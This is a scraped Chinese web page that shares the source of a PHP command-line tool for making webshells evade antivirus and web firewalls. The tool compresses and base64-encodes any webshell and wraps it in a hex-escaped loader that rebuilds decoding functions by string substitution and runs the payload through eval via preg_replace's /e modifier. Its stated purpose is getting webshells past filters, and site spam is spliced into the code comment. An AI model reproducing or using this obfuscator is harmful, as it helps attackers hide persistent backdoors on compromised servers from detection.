lostwolf写的
这不是webshell,只是个webshell免杀工具
切勿当初webshell使用
仅限免杀phpwebshell
该工具运行在 cli 模式!
如果有无法突破的文件内容过滤 可尝试下用这个工具 免杀大马!
任意php webshell 通过此工具编码之后可以饶过国内一些bt的防火墙
<BR><?php <BR>/* <BR>Title: PHP shell nokill T00L <BR>Blog: explo<div>……本2文来源gaodai.ma#com搞##代!^码@网3</div><code>搞代gaodaima码</code>it-db.blogcn.com <BR>*/ <BR>error_reporting(0); <BR>@ini_set('memory_limit','-1'); <BR>set_time_limit(0); <BR>$toolname="$argv[0]"; <BR>if ($argc<2) { <BR>baner($toolname); <BR>die; <BR>} <BR>$input_file= trim($argv[1]); <BR>$output_file='nokill_'.$input_file; <BR>if (file_exists($input_file)) { <BR>No_kill_c0de($input_file,$output_file); <BR>echo "PHP shell nokill T00L\r\n"; <BR>echo "Blog: exploit-db.blogcn.com\r\n"; <BR>echo "Input: {$input_file}\r\n"; <BR>$file_full_path=dirname(__FILE__).DIRECTORY_SEPARATOR.$output_file; <BR>echo "[+] Generate success!\r\n"; <BR>echo "Saved to {$file_full_path}"."\r\n"; <BR>} else { <BR>echo "PHP shell nokill T00L\r\n"; <BR>echo "Blog: exploit-db.blogcn.com\r\n"; <BR>die("[-] Failed ! The File $input_file does not exist"); <BR>} <BR>function No_kill_c0de($input_file,$output_file){ <BR>$no_whitespace=php_strip_whitespace($input_file); <BR>$no_php_tag=trim(trim(trim($no_whitespace,'<?php'),'<?'),'?>'); <BR>$enfile=base64_encode(gzdeflate($no_php_tag)); <BR>$shellcode="\x3c\x3f\x70\x68\x70\xd\xa"; <BR>$shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."\xd\xa"; <BR>$shellcode.="\x24\x62\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x66\x27\x2c\x22\x22\x2c\x22\x62\x66\x61\x66\x73\x66\x65\x66\x36\x66\x34\x66\x5f\x66\x66\x64\x66\x66\x65\x66\x66\x63\x66\x66\x6f\x66\x66\x64\x66\x66\x65\x66\x22\x29\x3b\xd\xa\x24\x67\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x58\x27\x2c\x27\x27\x2c\x27\x67\x58\x58\x7a\x58\x58\x69\x58\x58\x6e\x58\x58\x58\x58\x66\x58\x58\x58\x6c\x58\x58\x61\x58\x58\x58\x74\x58\x58\x58\x58\x58\x65\x27\x29\x3b\xd\xa\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x5c\x27\x61\x5c\x27\x65\x69\x73\x27\x2c\x27\x65\x27\x2e\x27\x76\x27\x2e\x27\x61\x27\x2e\x27\x6c\x27\x2e\x27\x28\x24\x67\x28\x24\x62\x28\x24\x65\x6e\x66\x69\x6c\x65\x29\x29\x29\x27\x2c\x27\x61\x27\x29\x3b\xd\xa"; <BR>$shellcode.="\x3f\x3e"; <BR>file_put_contents("$output_file",$shellcode); <BR>} <BR>function baner($toolname){ <BR>echo "PHP shell nokill T00L\r\n"; <BR>echo "Blog: exploit-db.blogcn.com\r\n"; <BR>echo "Usage: {$toolname} phpwebshell\r\n"; <BR>} <BR>?> <BR>
搞代码网(gaodaima.com)提供的所有资源部分来自互联网,如果有侵犯您的版权或其他权益,请说明详细缘由并提供版权或权益证明然后发送到邮箱[email protected],我们会在看到邮件的第一时间内为您处理,或直接联系QQ:872152909。本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:php shell超强免杀、减少体积工具实现代码_php实例
转载请注明原文链接:php shell超强免杀、减少体积工具实现代码_php实例
